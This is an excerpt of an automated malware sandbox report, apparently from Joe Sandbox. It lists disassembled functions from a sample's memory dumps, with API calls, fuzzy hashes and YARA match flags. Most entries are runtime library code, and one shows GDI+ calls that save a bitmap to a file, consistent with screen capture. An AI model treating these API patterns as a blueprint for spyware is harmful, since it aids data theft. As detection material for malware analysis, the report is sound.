Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: A0F03CB1A00514DFDB16FBA5C4006AE3B65AF15B05B469097E4445B260CB785988CFA1

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 0249B36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: 638c6d89fbce057c4e3dd2c61558b9519687e7f3e0227f2698054f98d66f9aea
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: AD71AF71900216DBDF21CF99E884ABFBFB6EF4572CF54422BE41157290DB708982CBA1

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 024A0CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940

_free.LIBCMT ref: 024A0DB6
_free.LIBCMT ref: 024A0DCD
_free.LIBCMT ref: 024A0DEC
_free.LIBCMT ref: 024A0E07
_free.LIBCMT ref: 024A0E1E

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: f82ca20b189b8137b97b4a785df3662bd38b35e9413d5145dfb4eb3d9334e506
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: D5519032A00704AFDB21DF6AD891B6BB7F5EF69724B14156EE809DB250E731E901CB80

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 024A1742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024A17B4
_free.LIBCMT ref: 024A17D4

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: dc67612cb229e640dd9053dbefcd7cb2562cfebe55b7af3f5626d21d4c3eda05
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: 4C41DF36A002049FCB20DF79C990AAEB7E6EF98714F1545AED919EB381D731E901CB80

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 0248B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0248B152

Part of subcall function 02481188: _SpinWait.LIBCONCRT ref: 024811A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0248B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0248B198
List.LIBCMT ref: 0248B21B
List.LIBCMT ref: 0248B22A

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: aabba020d17ecca51ada248c89119aed95fc0fc51d4dfc2164fee1eb17813de1
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: 3A315232A20616DFCB16FFA4C9906EEBBB2FF05348B04406FC805BB641CB716909CB91

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 024750C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 024750A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 024750B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0247511C
__Getcoll.LIBCPMT ref: 0247512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0247513B

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: 395c1ffbd8be14887cdae244d72618791d151c1109a24223cde4737e02e7dbb4
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: AC2198B2814208AFDB11EFA5C484BDDBBB1FF50716F50845FE4A5AB280DBB49948CF91

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 024A21C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0247DAD7,0247DAD7,00000002,0249ED35,024A3951,00000000,?,02496A05,00000002,00000000,00000000,00000000,?,0247CF88,0247DAD7,00000004), ref: 024A21CA
_free.LIBCMT ref: 024A21FF
_free.LIBCMT ref: 024A2226
SetLastError.KERNEL32(00000000,?,0247DAD7), ref: 024A2233
SetLastError.KERNEL32(00000000,?,0247DAD7), ref: 024A223C

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: 3f866474c3a6331fbe90defd2663998d42fcd66c8cb0b230a2ee07bafb44e7a1
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: 1501F937245B003B9316AB355C64E6B262EABF1B72B10013FFC15963D1EFF088069529

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 024A2141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
_free.LIBCMT ref: 024A2178
_free.LIBCMT ref: 024A21A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: 530fb421b4aeea4bdd977ac753655353c8eb359f940b8d7925027ee7f25cb720
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: DCF0A935544A003BD617A735AC29B1F262A9FF2F62F15012FFD1992390EFE185029529

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 02487B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024829A4: TlsGetValue.KERNEL32(?,?,02480DC2,02482ECF,00000000,?,02480DA0,?,?,?,00000000,?,00000000), ref: 024829AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02487BB1

Part of subcall function 0249121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02491241
Part of subcall function 0249121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0249125A
Part of subcall function 0249121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024912D0
Part of subcall function 0249121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024912D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02487BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02487BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02487BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 02487BF1

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 61cfcb8a269d5cf9be908b7264bd024e1ef9575c5d928871ac7cba30587f69f1
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: 9EF0F035A206586BCF15F7BB882096EFA6BDFC1B18B10416FD811A3350EF649E058ED2

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 024AA0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024AA0C4

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024AA0D6
_free.LIBCMT ref: 024AA0E8
_free.LIBCMT ref: 024AA0FA
_free.LIBCMT ref: 024AA10C

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 9bdfb0a4629b27b43b71d5c52d9e02c352ffd42c6b8cc2325cd89e18435b3b67
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: EAF06232509620AB8670EF59E8D6C0777EAAA14790764095BF008D7B11CB75F890CE59

Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 024A1991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024A19AF

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024A19C1
_free.LIBCMT ref: 024A19D4
_free.LIBCMT ref: 024A19E5
_free.LIBCMT ref: 024A19F6

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: eab23c0ae3902ff33b016c09165dc377b5b01624257cc4ec4544991858f8d174
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: FEF03070D047109F9F716F19AD904053F65AF29B62B0002ABF406977B2D774E862DF8E

Function 0248CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0248CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0248CF67
GetCurrentThread.KERNEL32 ref: 0248CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0248CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0248CF8C

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

